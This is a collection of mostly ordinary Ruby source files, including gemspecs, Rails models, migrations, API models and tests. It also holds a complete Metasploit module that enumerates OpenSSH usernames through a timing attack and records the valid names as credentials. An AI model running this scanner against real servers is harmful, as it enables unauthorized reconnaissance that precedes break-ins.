spec.metadata['allowed_push_host'] = "http://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.14"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "awesome_print"
spec.add_development_dependency "pry-byebug"
spec.add_development_dependency "rubocop"
spec.add_dependency "deep_merge"
spec.add_dependency "concurrent-ruby"
end
| 38.619048 | 96 | 0.692972 |
798becc54cf9efd3c47faad7ce034d0925794b20 | 155 | require 'spec_helper'
module Credere
describe Asset do
it_behaves_like 'a Credere::Account subtype', kind: :asset, normal_balance: :debit
end
end
| 19.375 | 86 | 0.754839 |
7a5d4dc6dddb56c21bb7c323429d88d268fbb140 | 5,215 | =begin
#EVE Swagger Interface
#An OpenAPI for EVE Online
OpenAPI spec version: 1.2.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.12
=end
require 'date'
module EVEOpenAPI
# Unprocessable entity
class GetWarsWarIdKillmailsUnprocessableEntity
# Unprocessable entity message
attr_accessor :error
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'error' => :'error'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'error' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'error')
self.error = attributes[:'error']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
error == o.error
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[error].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = EVEOpenAPI.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 28.037634 | 107 | 0.61745 |
bfa5cf75d6d8c814cf84d15751124a8f5a49e9bb | 1,151 | # frozen_string_literal: true
require 'English'
class ImageOptim
# Helper for running commands
module Cmd
class << self
# Run using `system`
# Return success status
# Will raise SignalException if process was interrupted
def run(*args)
success = system(*args)
check_status!
success
end
# Run using backtick
# Return captured output
# Will raise SignalException if process was interrupted
def capture(cmd)
output = `#{cmd}`
check_status!
output
end
private
def check_status!
status = $CHILD_STATUS
return unless status.signaled?
# jruby incorrectly returns true for `signaled?` if process exits with
# non zero status. For following code
#
# `sh -c 'exit 66'`
# p [$?.signaled?, $?.exitstatus, $?.termsig]
#
# jruby outputs `[true, 66, 66]` instead of expected `[false, 66, nil]`
return if defined?(JRUBY_VERSION) && status.exitstatus == status.termsig
fail SignalException, status.termsig
end
end
end
end
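
# A minimal usage sketch (the commands themselves are illustrative):
#
#   ImageOptim::Cmd.run('jpegoptim', '--strip-all', 'photo.jpg') # => true on success
#   output = ImageOptim::Cmd.capture('identify photo.jpg')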
| 22.134615 | 80 | 0.595135 |
611cf8d5fe9f1fdba1cd135bff2fdbe03e54296f | 2,290 | require_relative '../../version1_0'
require_relative '../../function'
require_relative '../../signature'
require_relative '../../semantics'
module BELParser
module Language
module Version1_0
module Functions
# Reaction: Denotes the frequency or abundance of events in
# a reaction
class Reaction
extend Function
SHORT = :rxn
LONG = :reaction
RETURN_TYPE = BELParser::Language::Version1_0::ReturnTypes::Abundance
          DESCRIPTION = 'Denotes the frequency or abundance of events ' \
            'in a reaction'.freeze
def self.short
SHORT
end
def self.long
LONG
end
def self.return_type
RETURN_TYPE
end
def self.description
DESCRIPTION
end
def self.signatures
SIGNATURES
end
module Signatures
# ReactionSignature
class ReactionSignature
extend BELParser::Language::Signature
private_class_method :new
AST = BELParser::Language::Semantics::Builder.build do
term(
function(
identifier(
function_of(Reaction))),
argument(
term(
function(
identifier(
return_type_of(BELParser::Language::Version1_0::ReturnTypes::Reactants))))),
argument(
term(
function(
identifier(
return_type_of(BELParser::Language::Version1_0::ReturnTypes::Products))))))
end
private_constant :AST
STRING_FORM = 'reaction(F:reactants,F:products)abundance'.freeze
private_constant :STRING_FORM
def self.semantic_ast
AST
end
def self.string_form
STRING_FORM
end
end
end
SIGNATURES = Signatures.constants.map do |const|
Signatures.const_get(const)
end.freeze
end
end
end
end
end
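
# For reference, the signature above corresponds to BEL statements shaped like
# the following (the term values are illustrative):
#
#   rxn(reactants(a(CHEBI:glucose)), products(a(CHEBI:pyruvate)))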
| 26.321839 | 102 | 0.500437 |
f85c364e4f6bd8f4ee19247bf7296112a6a90b5e | 199 | Rails.application.routes.draw do
# Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
# Defines the root path route ("/")
# root "application#hello"
end
| 28.428571 | 93 | 0.743719 |
fff48e4f589b68fb0dbb026f99c9ec63454b0746 | 427 | cask '[email protected]' do
version '5.5.3f1,4d2f809fd6f3'
sha256 'a1f48d94839096bd2e1f2c12d5d7eaa4173852d35ce8e1e29e1d5b30decedbba'
url "http://download.unity3d.com/download_unity/#{version.after_comma}/UnityDownloadAssistant-#{version.before_comma}.dmg"
name 'Unity'
homepage 'https://unity3d.com/unity/'
installer manual: 'Unity Download Assistant.app'
uninstall pkgutil: 'com.unity3d.*'
end
| 32.846154 | 124 | 0.782201 |
0194ddbf2fcb0f1203ec305698f11265144c6c0d | 655 | require_relative 'helper'
class User < Sohm::Model
include Sohm::AutoId
end
test "returns an empty hash if model doesn't have set attributes" do
assert_equal Hash.new, User.new.to_hash
end
test "returns a hash with its id if model is persisted" do
user = User.create
assert_equal Hash[id: user.id], user.to_hash
end
class Person < Sohm::Model
include Sohm::AutoId
attribute :name
def to_hash
super.merge(name: name)
end
end
test "returns additional attributes if the method is overrided" do
person = Person.create(name: "John")
expected = { id: person.id, name: person.name }
assert_equal expected, person.to_hash
end
| 19.848485 | 68 | 0.732824 |
d52c3f2fab955ec9e18874f99dbefceb1fc17d93 | 564 | require "rails_helper"
describe SiteStatusPolicy do
let(:organisation) { site_status.course.provider.organisations.first }
let(:site_status) { create :site_status }
subject { described_class }
permissions :update? do
let(:user) { create(:user).tap { |u| organisation.users << u } }
context "with an user inside the organisation" do
it { should permit(user, site_status) }
end
context "with a user outside the organisation" do
let(:user) { build(:user) }
it { should_not permit(user, site_status) }
end
end
end
| 24.521739 | 72 | 0.680851 |
1dcd3ac78d25a0da6c2a3a2cdb9888351714bac1 | 423 | module Org
module Model::JobDescription
extend ActiveSupport::Concern
included do
attribute :requirements, :text
attribute :advanced_requirements, :text
attribute :english_requirement, :string
attribute :degree_requirement, :string
attribute :duties, :text
attribute :salary_min, :integer
attribute :salary_max, :integer
belongs_to :department
end
end
end
| 22.263158 | 45 | 0.699764 |
9192aa2d9b793d367175600a60ee796e50e0f542 | 133 | class PgTableAccess < AdminFullAccess
def show?(table)
PgDataSourceAccess.new(context).can? :show, table.data_source
end
end
| 22.166667 | 65 | 0.766917 |
2698b963a318ea71a8261a195eb13217ed180566 | 576 | require 'rails_helper'
RSpec.describe PessoaPolicy do
let(:user) { User.new }
subject { described_class }
permissions ".scope" do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :show? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :create? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :update? do
pending "add some examples to (or delete) #{__FILE__}"
end
permissions :destroy? do
pending "add some examples to (or delete) #{__FILE__}"
end
end
| 19.862069 | 58 | 0.682292 |
aba7d20b48389639d9ae00bad03fb7f1a36f69bd | 749 | # frozen_string_literal: true
class CreateGrades < ActiveRecord::Migration
def change
create_table :grades do |t|
t.string :grade
t.integer :parent_id, index: true
t.timestamps null: false
end
create_table :document_grades do |t|
t.references :document, index: true, foreign_key: true
t.references :grade, index: true, foreign_key: true
t.timestamps null: false
end
create_table :lobject_grades do |t|
t.references :lobject, index: true, foreign_key: true
t.references :document, index: true, foreign_key: true
t.references :grade, index: true, foreign_key: true
t.timestamps null: false
end
add_foreign_key :grades, :grades, column: :parent_id
end
end
| 27.740741 | 60 | 0.687583 |
1d26144f2148df0c229c870a58664104dd5bc154 | 894 | #-------------------------------------------------------------------------------
#
# Thomas Thomassen
# thomas[at]thomthom[dot]net
#
#-------------------------------------------------------------------------------
module TT::Plugins::SolidInspector2
module Binary
module Types
# Standard Types
CHAR = "c".freeze
INT_16_T = "s" .freeze
INT_32_T = "l" .freeze
INT_64_T = "q" .freeze
UCHAR = "C".freeze
UINT_16_T = "S" .freeze
UINT_32_T = "L" .freeze
UINT_64_T = "Q" .freeze
UINT_16_BE = "n".freeze
UINT_32_BE = "N".freeze
UINT_16_LE = "v".freeze
UINT_32_LE = "V".freeze
# Windows Types
DWORD = UINT_32_LE
LONG = UINT_32_LE
WORD = UINT_16_LE
end # module
end # module
end # module TT::Plugins::SolidInspector2
| 21.804878 | 81 | 0.439597 |
3379adad443caa6669f22313e6a7db36729834af | 5,073 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'SSH Username Enumeration',
'Description' => %q{
This module uses a time-based attack to enumerate users on an OpenSSH server.
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user.
},
'Author' => ['kenkeiras'],
'References' =>
[
['CVE', '2006-5229'],
['OSVDB', '32721'],
['BID', '20418']
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::Proxies,
Opt::RPORT(22),
OptPath.new('USER_FILE',
[true, 'File containing usernames, one per line', nil]),
OptInt.new('THRESHOLD',
[true,
'Amount of seconds needed before a user is considered ' \
'found', 10])
], self.class
)
register_advanced_options(
[
OptInt.new('RETRY_NUM',
[true , 'The number of attempts to connect to a SSH server' \
' for each user', 3]),
OptInt.new('SSH_TIMEOUT',
[false, 'Specify the maximum time to negotiate a SSH session',
10]),
OptBool.new('SSH_DEBUG',
[false, 'Enable SSH debugging output (Extreme verbosity!)',
false])
]
)
end
def rport
datastore['RPORT']
end
def retry_num
datastore['RETRY_NUM']
end
def threshold
datastore['THRESHOLD']
end
# Returns true if a nonsense username appears active.
def check_false_positive(ip)
user = Rex::Text.rand_text_alphanumeric(8)
result = attempt_user(user, ip)
return(result == :success)
end
def check_user(ip, user, port)
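    # An extremely long password makes the server-side work, and therefore the
    # timing gap between valid and invalid users, measurable.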
pass = Rex::Text.rand_text_alphanumeric(64_000)
opt_hash = {
:auth_methods => ['password', 'keyboard-interactive'],
:msframework => framework,
:msfmodule => self,
:port => port,
:disable_agent => true,
:password => pass,
:config => false,
:proxies => datastore['Proxies']
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
start_time = Time.new
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(ip, user, opt_hash)
end
rescue Rex::ConnectionError
return :connection_error
rescue Net::SSH::Disconnect, ::EOFError
return :success
rescue ::Timeout::Error
return :success
rescue Net::SSH::Exception
end
finish_time = Time.new
if finish_time - start_time > threshold
:success
else
:fail
end
end
def do_report(ip, user, port)
service_data = {
address: ip,
port: rport,
service_name: 'ssh',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: user,
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end
# Because this isn't using the AuthBrute mixin, we don't have the
# usual peer method
def peer(rhost=nil)
"#{rhost}:#{rport} - SSH -"
end
def user_list
if File.readable? datastore['USER_FILE']
File.new(datastore['USER_FILE']).read.split
else
raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
end
end
def attempt_user(user, ip)
attempt_num = 0
ret = nil
    while attempt_num <= retry_num && (ret.nil? || ret == :connection_error)
if attempt_num > 0
Rex.sleep(2 ** attempt_num)
vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
end
ret = check_user(ip, user, rport)
attempt_num += 1
end
ret
end
def show_result(attempt_result, user, ip)
case attempt_result
when :success
print_good("#{peer(ip)} User '#{user}' found")
do_report(ip, user, rport)
when :connection_error
print_error("#{peer(ip)} User '#{user}' on could not connect")
when :fail
print_error("#{peer(ip)} User '#{user}' not found")
end
end
def run_host(ip)
print_status "#{peer(ip)} Checking for false positives"
if check_false_positive(ip)
print_error "#{peer(ip)} throws false positive results. Aborting."
return
else
print_status "#{peer(ip)} Starting scan"
user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
end
end
end
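
# A minimal msfconsole sketch for running this scanner; the module path,
# target address and wordlist location are assumptions:
#
#   use auxiliary/scanner/ssh/ssh_enumusers
#   set RHOSTS 192.0.2.10
#   set USER_FILE /tmp/users.txt
#   run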
| 25.621212 | 85 | 0.597871 |
03d2e87bdac317c80898258d60e553cbb2471068 | 1,149 | module RubyCAS
module Server
module Core
module Tickets
class TicketGrantingTicket < Storage
attr_accessor :id, :ticket, :client_hostname, :username,
:extra_attributes, :service_tickets, :proxy_tickets,
:created_at, :updated_at
def initialize(tgt = {})
@id = SecureRandom.uuid
@ticket = tgt[:ticket]
@client_hostname = tgt[:client_hostname]
@username = tgt[:username]
@extra_attributes = tgt[:extra_attributes]
@service_tickets = tgt[:service_tickets]
@proxy_tickets = tgt[:proxy_tickets]
@created_at = DateTime.now
@updated_at = DateTime.now
super()
end
def self.find_by_ticket(ticket)
          @storage.each do |_id, tgt|
            return tgt if tgt.ticket == ticket
          end
          nil
end
def expired?(max_lifetime)
lifetime = Time.now.to_i - created_at.to_time.to_i
lifetime > max_lifetime
end
end
end
end
end
end
| 29.461538 | 76 | 0.54134 |
7a9fdd45e8214df90e7686c9aaec674fa07a9963 | 5,888 | # encoding: utf-8
require "cases/helper"
require 'active_record/base'
require 'active_record/connection_adapters/postgresql_adapter'
require 'support/schema_dumping_helper'
module PostgresqlJSONSharedTestCases
include SchemaDumpingHelper
class JsonDataType < ActiveRecord::Base
self.table_name = 'json_data_type'
store_accessor :settings, :resolution
end
def setup
@connection = ActiveRecord::Base.connection
begin
@connection.transaction do
@connection.create_table('json_data_type') do |t|
t.public_send column_type, 'payload', default: {} # t.json 'payload', default: {}
t.public_send column_type, 'settings' # t.json 'settings'
end
end
rescue ActiveRecord::StatementInvalid
skip "do not test on PG without json"
end
@column = JsonDataType.columns_hash['payload']
end
def teardown
@connection.execute 'drop table if exists json_data_type'
end
def test_column
column = JsonDataType.columns_hash["payload"]
assert_equal column_type, column.type
assert_equal column_type.to_s, column.sql_type
assert_not column.number?
assert_not column.binary?
assert_not column.array
end
def test_default
@connection.add_column 'json_data_type', 'permissions', column_type, default: '{"users": "read", "posts": ["read", "write"]}'
JsonDataType.reset_column_information
assert_equal({"users"=>"read", "posts"=>["read", "write"]}, JsonDataType.column_defaults['permissions'])
assert_equal({"users"=>"read", "posts"=>["read", "write"]}, JsonDataType.new.permissions)
ensure
JsonDataType.reset_column_information
end
def test_change_table_supports_json
@connection.transaction do
@connection.change_table('json_data_type') do |t|
t.public_send column_type, 'users', default: '{}' # t.json 'users', default: '{}'
end
JsonDataType.reset_column_information
column = JsonDataType.columns_hash['users']
assert_equal column_type, column.type
raise ActiveRecord::Rollback # reset the schema change
end
ensure
JsonDataType.reset_column_information
end
def test_schema_dumping
output = dump_table_schema("json_data_type")
assert_match(/t.#{column_type.to_s}\s+"payload",\s+default: {}/, output)
end
def test_cast_value_on_write
x = JsonDataType.new payload: {"string" => "foo", :symbol => :bar}
assert_equal({"string" => "foo", :symbol => :bar}, x.payload_before_type_cast)
assert_equal({"string" => "foo", "symbol" => "bar"}, x.payload)
x.save
assert_equal({"string" => "foo", "symbol" => "bar"}, x.reload.payload)
end
def test_type_cast_json
column = JsonDataType.columns_hash["payload"]
data = "{\"a_key\":\"a_value\"}"
hash = column.type_cast_from_database(data)
assert_equal({'a_key' => 'a_value'}, hash)
assert_equal({'a_key' => 'a_value'}, column.type_cast_from_database(data))
assert_equal({}, column.type_cast_from_database("{}"))
assert_equal({'key'=>nil}, column.type_cast_from_database('{"key": null}'))
assert_equal({'c'=>'}','"a"'=>'b "a b'}, column.type_cast_from_database(%q({"c":"}", "\"a\"":"b \"a b"})))
end
def test_rewrite
@connection.execute "insert into json_data_type (payload) VALUES ('{\"k\":\"v\"}')"
x = JsonDataType.first
x.payload = { '"a\'' => 'b' }
assert x.save!
end
def test_select
@connection.execute "insert into json_data_type (payload) VALUES ('{\"k\":\"v\"}')"
x = JsonDataType.first
assert_equal({'k' => 'v'}, x.payload)
end
def test_select_multikey
@connection.execute %q|insert into json_data_type (payload) VALUES ('{"k1":"v1", "k2":"v2", "k3":[1,2,3]}')|
x = JsonDataType.first
assert_equal({'k1' => 'v1', 'k2' => 'v2', 'k3' => [1,2,3]}, x.payload)
end
def test_null_json
@connection.execute %q|insert into json_data_type (payload) VALUES(null)|
x = JsonDataType.first
assert_equal(nil, x.payload)
end
def test_select_array_json_value
@connection.execute %q|insert into json_data_type (payload) VALUES ('["v0",{"k1":"v1"}]')|
x = JsonDataType.first
assert_equal(['v0', {'k1' => 'v1'}], x.payload)
end
def test_rewrite_array_json_value
@connection.execute %q|insert into json_data_type (payload) VALUES ('["v0",{"k1":"v1"}]')|
x = JsonDataType.first
x.payload = ['v1', {'k2' => 'v2'}, 'v3']
assert x.save!
end
def test_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
x.save!
x = JsonDataType.first
assert_equal "320×480", x.resolution
x.resolution = "640×1136"
x.save!
x = JsonDataType.first
assert_equal "640×1136", x.resolution
end
def test_duplication_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
y = x.dup
assert_equal "320×480", y.resolution
end
def test_yaml_round_trip_with_store_accessors
x = JsonDataType.new(resolution: "320×480")
assert_equal "320×480", x.resolution
y = YAML.load(YAML.dump(x))
assert_equal "320×480", y.resolution
end
def test_changes_in_place
json = JsonDataType.new
assert_not json.changed?
json.payload = { 'one' => 'two' }
assert json.changed?
assert json.payload_changed?
json.save!
assert_not json.changed?
json.payload['three'] = 'four'
assert json.payload_changed?
json.save!
json.reload
assert_equal({ 'one' => 'two', 'three' => 'four' }, json.payload)
assert_not json.changed?
end
end
class PostgresqlJSONTest < ActiveRecord::TestCase
include PostgresqlJSONSharedTestCases
def column_type
:json
end
end
class PostgresqlJSONBTest < ActiveRecord::TestCase
include PostgresqlJSONSharedTestCases
def column_type
:jsonb
end
end
| 29.148515 | 129 | 0.676461 |
91182d7ffb3a9ae2f8ba85a5ba32547c86dc6b94 | 475 | require 'bundler/setup'
require 'minitest'
require 'minitest/autorun'
require 'minitest/reporters'
require 'minitest/spec'
require 'dragonfly'
require 'dragonfly_pdf'
SAMPLES_DIR = Pathname.new(File.expand_path('../../samples', __FILE__))
Minitest::Reporters.use! Minitest::Reporters::SpecReporter.new
def test_app(name = nil)
  Dragonfly::App.instance(name).tap do |app|
    app.datastore = Dragonfly::MemoryDataStore.new
    app.secret = 'test secret'
  end
end
| 22.619048 | 71 | 0.749474 |
e95251f4ae37bffb900fc3cd8ead5c90cebf4489 | 126 | require 'test_helper'
class BoardMessageTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 15.75 | 48 | 0.714286 |
79440bbc490d4423a3996616c694af6c44d52f8d | 438 | class News
include Mongoid::Document
field :version, type: String
field :message, type: String
validates :version, presence: true, format: { with: /\A\d{1,3}\.\d{1,3}\.\d{1,3}\z/ }
validates :message, presence: true, length: { minimum: 3, maximum: 300 }
def ==(obj)
return false if obj.nil?
return false unless self.class == obj.class
(self.message == obj.message) && (self.version == obj.version)
end
end | 29.2 | 87 | 0.646119 |
bb27766712cdcf277986c8aa4addae530164e97c | 4,478 | class Post < ApplicationRecord
include WithActivity
include ContentProcessable
include ContentEmbeddable
WordfilterCallbacks.hook(self, :post, :content)
acts_as_paranoid
resourcify
processable :content, LongPipeline
update_algolia 'AlgoliaPostsIndex'
embed_links_in :content, to: :embed
enum locked_reason: { spam: 0, too_heated: 1, closed: 2 }
belongs_to :user
belongs_to :edited_by, class_name: 'User', optional: true
belongs_to :target_user, class_name: 'User', optional: true
belongs_to :target_group, class_name: 'Group', optional: true
belongs_to :media, polymorphic: true, optional: true
belongs_to :spoiled_unit, polymorphic: true, optional: true
belongs_to :community_recommendation, optional: true
belongs_to :locked_by, class_name: 'User', optional: true
has_many :post_likes, dependent: :destroy
has_many :post_follows, dependent: :destroy
has_many :comments, dependent: :destroy
has_many :uploads, as: 'owner', dependent: :destroy
has_one :ama, foreign_key: 'original_post_id'
has_one :pinner, class_name: 'User', foreign_key: 'pinned_post_id', dependent: :nullify
has_many :reposts, dependent: :delete_all
scope :sfw, -> { where(nsfw: false) }
scope :in_group, ->(group) { where(target_group: group) }
scope :visible_for, ->(user) {
where(target_group_id: Group.visible_for(user))
.or(where(target_group_id: nil))
.where(hidden_at: nil)
.or(where(user_id: user).where.not(hidden_at: nil))
}
validates :content, :content_formatted, presence: true, unless: :uploads
validates :uploads, presence: true, unless: :content
validates :media, presence: true, if: :spoiled_unit
validates :content, length: { maximum: 9_000 }
validates :media, polymorphism: { type: Media }, allow_blank: true
# posting to a group, posting to a profile, and posting to an interest are mutually exclusive.
validates_with ExclusivityValidator, over: %i[target_user target_group target_interest]
validates_with ExclusivityValidator, over: %i[uploads embed]
validates :target_user, absence: true, if: :target_group
def feed
PostFeed.new(id)
end
def comments_feed
PostCommentsFeed.new(id)
end
def other_feeds
feeds = []
feeds << GlobalFeed.new if user.share_to_global? && target_user.blank? && target_group.blank?
# Limit media-feed fanout when targeting a unit
feeds << (spoiled_unit ? media&.feed&.no_fanout : media&.feed)
feeds << spoiled_unit&.feed
feeds.compact
end
def notified_feeds
[
target_user&.notifications,
*mentioned_users.map(&:notifications)
].compact - [user.notifications]
end
def target_feed
if target_user # A => B, post to B without fanout
target_user.profile_feed.no_fanout
elsif target_group # A => Group, post to Group
target_group.feed
else # General post, fanout normally
user.profile_feed
end
end
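
  # Routing summary for the branches above: a post aimed at a user goes only
  # to that user's profile feed (no fanout), a group post goes to the group
  # feed, and anything else fans out from the author's profile feed.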
def target_timelines
return [] unless target_user
[user.timeline, target_user.timeline]
end
def stream_activity
target_feed.activities.new(
post_id: id,
updated_at: updated_at,
post_likes_count: post_likes_count,
comments_count: comments_count,
nsfw: nsfw,
mentioned_users: mentioned_users.pluck(:id),
to: other_feeds + notified_feeds + target_timelines
)
end
def mentioned_users
User.where(id: processed_content[:mentioned_users])
end
def locked?
locked_by.present?
end
before_save do
# Always check if the media is NSFW and try to force into NSFWness
self.nsfw = media.try(:nsfw?) || false unless nsfw
self.nsfw = target_group.try(:nsfw?) || false unless nsfw
true
end
before_update do
if content_changed? || nsfw_changed? || spoiler?
self.edited_at = Time.now
self.edited_by = User.current
end
true
end
after_create do
User.increment_counter(:posts_count, user.id) unless user.posts_count >= 20
media.trending_vote(user, 2.0) if media.present?
GroupUnreadFanoutWorker.perform_async(target_group_id, user_id) if target_group.present?
if community_recommendation.present?
CommunityRecommendationReasonWorker.perform_async(self, community_recommendation)
end
end
before_destroy do
deletions = reposts.pluck(:user_id, :id).map do |user_id, repost_id|
[['user', user_id], { foreign_id: "repost:#{repost_id}" }]
end
ActivityDeletionWorker.perform_async(deletions)
end
end
| 32.215827 | 97 | 0.722421 |
d569cdc3c38c2105d56007eae67c2c8dd03ef850 | 951 | # frozen_string_literal: true
require_relative '../core/lib/spree/core/version.rb'
Gem::Specification.new do |gem|
gem.author = 'Solidus Team'
gem.email = '[email protected]'
gem.homepage = 'http://solidus.io/'
gem.license = 'BSD-3-Clause'
gem.summary = 'REST API for the Solidus e-commerce framework.'
gem.description = gem.summary
gem.files = `git ls-files`.split($\)
gem.executables = gem.files.grep(%r{^bin/}).map{ |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.name = "solidus_api"
gem.require_paths = ["lib"]
gem.version = Spree.solidus_version
gem.required_ruby_version = '>= 2.2.2'
gem.required_rubygems_version = '>= 1.8.23'
gem.add_dependency 'jbuilder', '~> 2.6'
gem.add_dependency 'kaminari-activerecord', '~> 1.0.1'
gem.add_dependency 'responders'
gem.add_dependency 'solidus_core', gem.version
end
| 32.793103 | 75 | 0.656151 |
4aa0f87cbde0b45b5cb5d8ff8867fae0baa72613 | 416 | # frozen_string_literal: true
FactoryBot.define do
factory :assignment do
title do
Faker::Marketing.buzzwords +
Faker::Number.between(from: 1, to: 9999).to_s
end
deadline { Faker::Time.forward(days: 30) }
accepted_file_type { '.pdf' }
trait :with_lecture do
association :lecture, :released_for_all
end
factory :valid_assignment, traits: [:with_lecture]
end
end
| 21.894737 | 54 | 0.677885 |
5dcc95be63fa0192675c8fa2cd88c7856def4e59 | 2,198 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/datacatalog/v1/table_spec.proto
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/datacatalog/v1/table_spec.proto", :syntax => :proto3) do
add_message "google.cloud.datacatalog.v1.BigQueryTableSpec" do
optional :table_source_type, :enum, 1, "google.cloud.datacatalog.v1.TableSourceType"
oneof :type_spec do
optional :view_spec, :message, 2, "google.cloud.datacatalog.v1.ViewSpec"
optional :table_spec, :message, 3, "google.cloud.datacatalog.v1.TableSpec"
end
end
add_message "google.cloud.datacatalog.v1.ViewSpec" do
optional :view_query, :string, 1
end
add_message "google.cloud.datacatalog.v1.TableSpec" do
optional :grouped_entry, :string, 1
end
add_message "google.cloud.datacatalog.v1.BigQueryDateShardedSpec" do
optional :dataset, :string, 1
optional :table_prefix, :string, 2
optional :shard_count, :int64, 3
optional :latest_shard_resource, :string, 4
end
add_enum "google.cloud.datacatalog.v1.TableSourceType" do
value :TABLE_SOURCE_TYPE_UNSPECIFIED, 0
value :BIGQUERY_VIEW, 2
value :BIGQUERY_TABLE, 5
value :BIGQUERY_MATERIALIZED_VIEW, 7
end
end
end
module Google
module Cloud
module DataCatalog
module V1
BigQueryTableSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.BigQueryTableSpec").msgclass
ViewSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.ViewSpec").msgclass
TableSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.TableSpec").msgclass
BigQueryDateShardedSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.BigQueryDateShardedSpec").msgclass
TableSourceType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.datacatalog.v1.TableSourceType").enummodule
end
end
end
end
| 43.098039 | 154 | 0.743858 |
38f3eadbb223a5579b704959470af68054a5e4ae | 95,485 | # frozen_string_literal: true
require 'spec_helper'
